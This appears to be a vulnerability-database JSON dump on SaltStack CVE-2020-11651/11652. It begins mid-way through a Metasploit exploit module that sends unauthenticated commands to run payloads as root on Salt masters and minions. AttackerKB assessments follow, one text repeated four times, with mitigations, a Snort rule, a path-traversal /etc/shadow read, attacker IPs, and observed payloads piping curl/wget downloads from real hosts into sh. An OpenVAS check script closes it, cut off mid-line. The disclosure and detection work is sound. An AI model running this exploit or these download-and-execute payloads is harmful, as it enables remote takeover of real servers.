\n# https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L1898-L1951 \n# https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L1898-L1951 \nrunner = { \n'cmd' => 'runner', \n# https://docs.saltstack.com/en/master/ref/runners/all/salt.runners.salt.html#salt.runners.salt.cmd \n'fun' => 'salt.cmd', \n'kwarg' => { \n'hide_output' => true, \n'ignore_retcode' => true, \n'output_loglevel' => 'quiet' \n}, \n'user' => 'root', # This is NOT the Unix user! \n'key' => root_key # No JID needed, only the root key! \n} \n \ncase target['Type'] \nwhen :python \nvprint_status(\"Executing Python code: #{payload.encoded}\") \n \n# https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code \nrunner['kwarg'].merge!( \n'fun' => 'cmd.exec_code', \n'lang' => payload.arch.first, \n'code' => payload.encoded \n) \nwhen :unix_command \n# HTTPS doesn't appear to be supported by the server :( \nprint_status(\"Serving intermediate stager over HTTP: #{start_service}\") \n \nvprint_status(\"Executing Unix command: #{payload.encoded}\") \n \n# https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.script \nrunner['kwarg'].merge!( \n# cmd.run doesn't work due to a missing argument error, so we use this \n'fun' => 'cmd.script', \n'source' => get_uri, \n'stdin' => payload.encoded \n) \nend \n \nvprint_status(\"Unserialized clear load: #{runner}\") \nzmq_send_message(serialize_clear_load(runner)) \n \nunless (res = sock.get_once) \nfail_with(Failure::Unknown, 'Did not receive runner() response') \nend \n \nvprint_good(\"Received runner() response: #{res.inspect}\") \nend \n \ndef yeet_send_pub \nprint_status(\"Yeeting _send_pub() at #{peer}\") \n \n# NOTE: A unique JID (job ID) is needed for every published job \njid = generate_jid \n \n# https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L2043-L2151 \n# https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L2043-L2151 \nsend_pub = { \n'cmd' => '_send_pub', \n'kwargs' => { \n'bg' => true, \n'hide_output' => true, \n'ignore_retcode' => true, \n'output_loglevel' => 'quiet', \n'show_jid' => false, \n'show_timeout' => false \n}, \n'user' => 'root', # This is NOT the Unix user! \n'tgt' => datastore['MINIONS'].source, \n'tgt_type' => 'pcre', \n'jid' => jid \n} \n \ncase target['Type'] \nwhen :python \nvprint_status(\"Executing Python code: #{payload.encoded}\") \n \n# https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code \nsend_pub.merge!( \n'fun' => 'cmd.exec_code', \n'arg' => [payload.arch.first, payload.encoded] \n) \nwhen :unix_command \nvprint_status(\"Executing Unix command: #{payload.encoded}\") \n \n# https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.run \nsend_pub.merge!( \n'fun' => 'cmd.run', \n'arg' => [payload.encoded] \n) \nend \n \nvprint_status(\"Unserialized clear load: #{send_pub}\") \nzmq_send_message(serialize_clear_load(send_pub)) \n \nunless (res = sock.get_once) \nfail_with(Failure::Unknown, 'Did not receive _send_pub() response') \nend \n \nvprint_good(\"Received _send_pub() response: #{res.inspect}\") \n \n# NOTE: This path will likely change between platforms and distros \nregister_file_for_cleanup(\"/var/cache/salt/minion/proc/#{jid}\") \nend \n \n# https://github.com/saltstack/salt/blob/v2019.2.3/salt/utils/jid.py \n# https://github.com/saltstack/salt/blob/v3000.1/salt/utils/jid.py \ndef generate_jid \nDateTime.now.new_offset.strftime('%Y%m%d%H%M%S%6N') \nend \n \n# HACK: Stub out the command stager used by Msf::Exploit::CmdStager::HTTP \ndef stager_instance \nnil \nend \n \n# HACK: Sub out the executable used by Msf::Exploit::CmdStager::HTTP \ndef exe \n# NOTE: The shebang line is necessary in this case! \n<<~SHELL \n#!/bin/sh \n/bin/sh \nSHELL \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/157678/saltstack_salt_unauth_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-01-19T17:12:59", "description": "An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-30T00:00:00", "type": "attackerkb", "title": "CVE-2020-11652", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-08-28T00:00:00", "id": "AKB:52C0CBC0-02B2-4F9D-9C4B-5825DD7EF1AD", "href": "https://attackerkb.com/topics/gdqFyHOPSM/cve-2020-11652", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-10T16:43:16", "description": "An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.\n\n \n**Recent assessments:** \n \n**kevthehermit** at May 01, 2020 8:19pm UTC reported:\n\n#### Overview\n\nFor Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.\n\nIf a salt-master has its ZeroMQ ports `4506` exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.\n\nThis requires multiple socket requests. one to read the key and then additional requests to create jobs.\n\n#### Proof Of Concept\n\nThis POC was tested on SaltStack 2019.2.0\n\nAs of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here \u2013 <https://github.com/kevthehermit/CVE-2020-11651>\n\nThe POC and others I am sure will appear shortly has the following functionality\n\n * Read the root key \n\n * Read and Write files on the Salt Master \n\n * Construct a payload to gain full RCE as root on any connected Minion \n\n\nThis took several hours and is \u201ceasy\u201d with the available information and access to a test instance. Details on the discovery process can be found on our blog \u2013 <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/>\n\n#### Mitigations:\n\nPatch to the latest versions and do not expose theses ports to the external network.\n\n#### Detections\n\nexamine `/var/cache/salt/master/jobs/` on the salt master for a listing of all jobs. the `return.p` file in these dirs will contain a detailed description of the request and the response. This data is serialised.\n\nImmersive Labs have released a basic python script to parse all these job files \u2013 <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>\n \n \n # cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p\n \ufffd\ufffdreturn\ufffd\ufffdfun\ufffdwheel.file_roots.read\ufffdjid\ufffd20200501195107225222\ufffduser\ufffdUNKNOWN\ufffdfun_args\ufffd\ufffd../../../../etc/shadow\ufffd\ufffdsaltenv\ufffdbase\ufffd_stamp\ufffd2020-05-01T19:51:07.229260\ufffdreturn\ufffd\ufffd\ufffd /srv/salt/../../../../etc/shadow\ufffd\ufffdroot:!::0:::::\n bin:!::0:::::\n daemon:!::0:::::\n adm:!::0:::::\n lp:!::0:::::\n sync:!::0:::::\n shutdown:!::0:::::\n halt:!::0:::::\n mail:!::0:::::\n news:!::0:::::\n uucp:!::0:::::\n operator:!::0:::::\n man:!::0:::::\n postmaster:!::0:::::\n cron:!::0:::::\n ftp:!::0:::::\n sshd:!::0:::::\n at:!::0:::::\n squid:!::0:::::\n xfs:!::0:::::\n games:!::0:::::\n postgres:!::0:::::\n cyrus:!::0:::::\n vpopmail:!::0:::::\n ntp:!::0:::::\n smmsp:!::0:::::\n guest:!::0:::::\n nobody:!::0:::::\n salt:!:18164:0:99999:7:::\n \n \n\nSnort Rule:\n\n`alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:\"Salt Stack root_key read attempt\"; content:\"_prep_auth_info\"; sid:1000000; rev:1;)`\n\nOn the wire it looks a bit like this so a stronger rule can be created \n`b'\\x82\\xa3enc\\xa5clear\\xa4load\\x81\\xa3cmd\\xaf_prep_auth_info'`\n\n#### In the wild\n\nThe following IPS have been observed sending malicious payloads. other IPS have been seen scanning.\n\n * 95.181.178.108 \n\n * 89.151.132.112 \n\n * 89.27.255.58 \n\n * 104.244.76.189 \n\n * 95.213.139.92 \n\n * 81.92.218.74 \n\n * 178.44.87.133 \n\n\n#### Payloads\n\nThe following Payloads have been observed\n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `import subprocess;subprocess.call(\\\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\\\",shell=True)` \n\n * `/bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='` \n\n * `(curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh` \n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `(curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh` \n\n * `/bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]` \n\n\n**hrbrmstr** at May 04, 2020 10:40am UTC reported:\n\n#### Overview\n\nFor Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.\n\nIf a salt-master has its ZeroMQ ports `4506` exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.\n\nThis requires multiple socket requests. one to read the key and then additional requests to create jobs.\n\n#### Proof Of Concept\n\nThis POC was tested on SaltStack 2019.2.0\n\nAs of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here \u2013 <https://github.com/kevthehermit/CVE-2020-11651>\n\nThe POC and others I am sure will appear shortly has the following functionality\n\n * Read the root key \n\n * Read and Write files on the Salt Master \n\n * Construct a payload to gain full RCE as root on any connected Minion \n\n\nThis took several hours and is \u201ceasy\u201d with the available information and access to a test instance. Details on the discovery process can be found on our blog \u2013 <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/>\n\n#### Mitigations:\n\nPatch to the latest versions and do not expose theses ports to the external network.\n\n#### Detections\n\nexamine `/var/cache/salt/master/jobs/` on the salt master for a listing of all jobs. the `return.p` file in these dirs will contain a detailed description of the request and the response. This data is serialised.\n\nImmersive Labs have released a basic python script to parse all these job files \u2013 <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>\n \n \n # cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p\n \ufffd\ufffdreturn\ufffd\ufffdfun\ufffdwheel.file_roots.read\ufffdjid\ufffd20200501195107225222\ufffduser\ufffdUNKNOWN\ufffdfun_args\ufffd\ufffd../../../../etc/shadow\ufffd\ufffdsaltenv\ufffdbase\ufffd_stamp\ufffd2020-05-01T19:51:07.229260\ufffdreturn\ufffd\ufffd\ufffd /srv/salt/../../../../etc/shadow\ufffd\ufffdroot:!::0:::::\n bin:!::0:::::\n daemon:!::0:::::\n adm:!::0:::::\n lp:!::0:::::\n sync:!::0:::::\n shutdown:!::0:::::\n halt:!::0:::::\n mail:!::0:::::\n news:!::0:::::\n uucp:!::0:::::\n operator:!::0:::::\n man:!::0:::::\n postmaster:!::0:::::\n cron:!::0:::::\n ftp:!::0:::::\n sshd:!::0:::::\n at:!::0:::::\n squid:!::0:::::\n xfs:!::0:::::\n games:!::0:::::\n postgres:!::0:::::\n cyrus:!::0:::::\n vpopmail:!::0:::::\n ntp:!::0:::::\n smmsp:!::0:::::\n guest:!::0:::::\n nobody:!::0:::::\n salt:!:18164:0:99999:7:::\n \n \n\nSnort Rule:\n\n`alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:\"Salt Stack root_key read attempt\"; content:\"_prep_auth_info\"; sid:1000000; rev:1;)`\n\nOn the wire it looks a bit like this so a stronger rule can be created \n`b'\\x82\\xa3enc\\xa5clear\\xa4load\\x81\\xa3cmd\\xaf_prep_auth_info'`\n\n#### In the wild\n\nThe following IPS have been observed sending malicious payloads. other IPS have been seen scanning.\n\n * 95.181.178.108 \n\n * 89.151.132.112 \n\n * 89.27.255.58 \n\n * 104.244.76.189 \n\n * 95.213.139.92 \n\n * 81.92.218.74 \n\n * 178.44.87.133 \n\n\n#### Payloads\n\nThe following Payloads have been observed\n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `import subprocess;subprocess.call(\\\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\\\",shell=True)` \n\n * `/bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='` \n\n * `(curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh` \n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `(curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh` \n\n * `/bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]` \n\n\n**z0r1nga** at April 30, 2020 11:57pm UTC reported:\n\n#### Overview\n\nFor Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.\n\nIf a salt-master has its ZeroMQ ports `4506` exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.\n\nThis requires multiple socket requests. one to read the key and then additional requests to create jobs.\n\n#### Proof Of Concept\n\nThis POC was tested on SaltStack 2019.2.0\n\nAs of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here \u2013 <https://github.com/kevthehermit/CVE-2020-11651>\n\nThe POC and others I am sure will appear shortly has the following functionality\n\n * Read the root key \n\n * Read and Write files on the Salt Master \n\n * Construct a payload to gain full RCE as root on any connected Minion \n\n\nThis took several hours and is \u201ceasy\u201d with the available information and access to a test instance. Details on the discovery process can be found on our blog \u2013 <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/>\n\n#### Mitigations:\n\nPatch to the latest versions and do not expose theses ports to the external network.\n\n#### Detections\n\nexamine `/var/cache/salt/master/jobs/` on the salt master for a listing of all jobs. the `return.p` file in these dirs will contain a detailed description of the request and the response. This data is serialised.\n\nImmersive Labs have released a basic python script to parse all these job files \u2013 <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>\n \n \n # cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p\n \ufffd\ufffdreturn\ufffd\ufffdfun\ufffdwheel.file_roots.read\ufffdjid\ufffd20200501195107225222\ufffduser\ufffdUNKNOWN\ufffdfun_args\ufffd\ufffd../../../../etc/shadow\ufffd\ufffdsaltenv\ufffdbase\ufffd_stamp\ufffd2020-05-01T19:51:07.229260\ufffdreturn\ufffd\ufffd\ufffd /srv/salt/../../../../etc/shadow\ufffd\ufffdroot:!::0:::::\n bin:!::0:::::\n daemon:!::0:::::\n adm:!::0:::::\n lp:!::0:::::\n sync:!::0:::::\n shutdown:!::0:::::\n halt:!::0:::::\n mail:!::0:::::\n news:!::0:::::\n uucp:!::0:::::\n operator:!::0:::::\n man:!::0:::::\n postmaster:!::0:::::\n cron:!::0:::::\n ftp:!::0:::::\n sshd:!::0:::::\n at:!::0:::::\n squid:!::0:::::\n xfs:!::0:::::\n games:!::0:::::\n postgres:!::0:::::\n cyrus:!::0:::::\n vpopmail:!::0:::::\n ntp:!::0:::::\n smmsp:!::0:::::\n guest:!::0:::::\n nobody:!::0:::::\n salt:!:18164:0:99999:7:::\n \n \n\nSnort Rule:\n\n`alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:\"Salt Stack root_key read attempt\"; content:\"_prep_auth_info\"; sid:1000000; rev:1;)`\n\nOn the wire it looks a bit like this so a stronger rule can be created \n`b'\\x82\\xa3enc\\xa5clear\\xa4load\\x81\\xa3cmd\\xaf_prep_auth_info'`\n\n#### In the wild\n\nThe following IPS have been observed sending malicious payloads. other IPS have been seen scanning.\n\n * 95.181.178.108 \n\n * 89.151.132.112 \n\n * 89.27.255.58 \n\n * 104.244.76.189 \n\n * 95.213.139.92 \n\n * 81.92.218.74 \n\n * 178.44.87.133 \n\n\n#### Payloads\n\nThe following Payloads have been observed\n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `import subprocess;subprocess.call(\\\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\\\",shell=True)` \n\n * `/bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='` \n\n * `(curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh` \n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `(curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh` \n\n * `/bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]` \n\n\n**wvu-r7** at May 04, 2020 7:36am UTC reported:\n\n#### Overview\n\nFor Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.\n\nIf a salt-master has its ZeroMQ ports `4506` exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.\n\nThis requires multiple socket requests. one to read the key and then additional requests to create jobs.\n\n#### Proof Of Concept\n\nThis POC was tested on SaltStack 2019.2.0\n\nAs of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here \u2013 <https://github.com/kevthehermit/CVE-2020-11651>\n\nThe POC and others I am sure will appear shortly has the following functionality\n\n * Read the root key \n\n * Read and Write files on the Salt Master \n\n * Construct a payload to gain full RCE as root on any connected Minion \n\n\nThis took several hours and is \u201ceasy\u201d with the available information and access to a test instance. Details on the discovery process can be found on our blog \u2013 <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/>\n\n#### Mitigations:\n\nPatch to the latest versions and do not expose theses ports to the external network.\n\n#### Detections\n\nexamine `/var/cache/salt/master/jobs/` on the salt master for a listing of all jobs. the `return.p` file in these dirs will contain a detailed description of the request and the response. This data is serialised.\n\nImmersive Labs have released a basic python script to parse all these job files \u2013 <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>\n \n \n # cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p\n \ufffd\ufffdreturn\ufffd\ufffdfun\ufffdwheel.file_roots.read\ufffdjid\ufffd20200501195107225222\ufffduser\ufffdUNKNOWN\ufffdfun_args\ufffd\ufffd../../../../etc/shadow\ufffd\ufffdsaltenv\ufffdbase\ufffd_stamp\ufffd2020-05-01T19:51:07.229260\ufffdreturn\ufffd\ufffd\ufffd /srv/salt/../../../../etc/shadow\ufffd\ufffdroot:!::0:::::\n bin:!::0:::::\n daemon:!::0:::::\n adm:!::0:::::\n lp:!::0:::::\n sync:!::0:::::\n shutdown:!::0:::::\n halt:!::0:::::\n mail:!::0:::::\n news:!::0:::::\n uucp:!::0:::::\n operator:!::0:::::\n man:!::0:::::\n postmaster:!::0:::::\n cron:!::0:::::\n ftp:!::0:::::\n sshd:!::0:::::\n at:!::0:::::\n squid:!::0:::::\n xfs:!::0:::::\n games:!::0:::::\n postgres:!::0:::::\n cyrus:!::0:::::\n vpopmail:!::0:::::\n ntp:!::0:::::\n smmsp:!::0:::::\n guest:!::0:::::\n nobody:!::0:::::\n salt:!:18164:0:99999:7:::\n \n \n\nSnort Rule:\n\n`alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:\"Salt Stack root_key read attempt\"; content:\"_prep_auth_info\"; sid:1000000; rev:1;)`\n\nOn the wire it looks a bit like this so a stronger rule can be created \n`b'\\x82\\xa3enc\\xa5clear\\xa4load\\x81\\xa3cmd\\xaf_prep_auth_info'`\n\n#### In the wild\n\nThe following IPS have been observed sending malicious payloads. other IPS have been seen scanning.\n\n * 95.181.178.108 \n\n * 89.151.132.112 \n\n * 89.27.255.58 \n\n * 104.244.76.189 \n\n * 95.213.139.92 \n\n * 81.92.218.74 \n\n * 178.44.87.133 \n\n\n#### Payloads\n\nThe following Payloads have been observed\n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `import subprocess;subprocess.call(\\\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\\\",shell=True)` \n\n * `/bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='` \n\n * `(curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh` \n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `(curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh` \n\n * `/bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]` \n\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-30T00:00:00", "type": "attackerkb", "title": "CVE-2020-11651", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-08-28T00:00:00", "id": "AKB:C964B102-C1A8-42E7-AE93-2D5FCBAD769C", "href": "https://attackerkb.com/topics/rEVl04z1p0/cve-2020-11651", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-05-12T15:13:45", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-05-01T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for salt (openSUSE-SU-2020:0564-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-11T00:00:00", "id": "OPENVAS:1361412562310853131", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310853131", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.853131\");\n script_version(\"2020-05-11T07:05:27+0000\");\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-11 07:05:27 +0000 (Mon, 11 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-01 03:01:53 +0000 (Fri, 01 May 2020)\");\n script_name(\"openSUSE: Security Advisory for salt (openSUSE-SU-2020:0564-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.1\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2020:0564-1\");\n script_xref(name:\"URL\", value:\"http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'salt'\n package(s) announced via the openSUSE-SU-2020:0564-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for salt fixes the following issues:\n\n - Fix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-564=1\");\n\n script_tag(name:\"affected\", value:\"'salt' package(s) on openSUSE Leap 15.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"python2-salt\", rpm:\"python2-salt~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python3-salt\", rpm:\"python3-salt~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt\", rpm:\"salt~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"salt-api\", rpm:\"salt-api~2019.2.0~lp151.5.15.1\", rls:\"openSUSELeap15.1\"))) {\n report 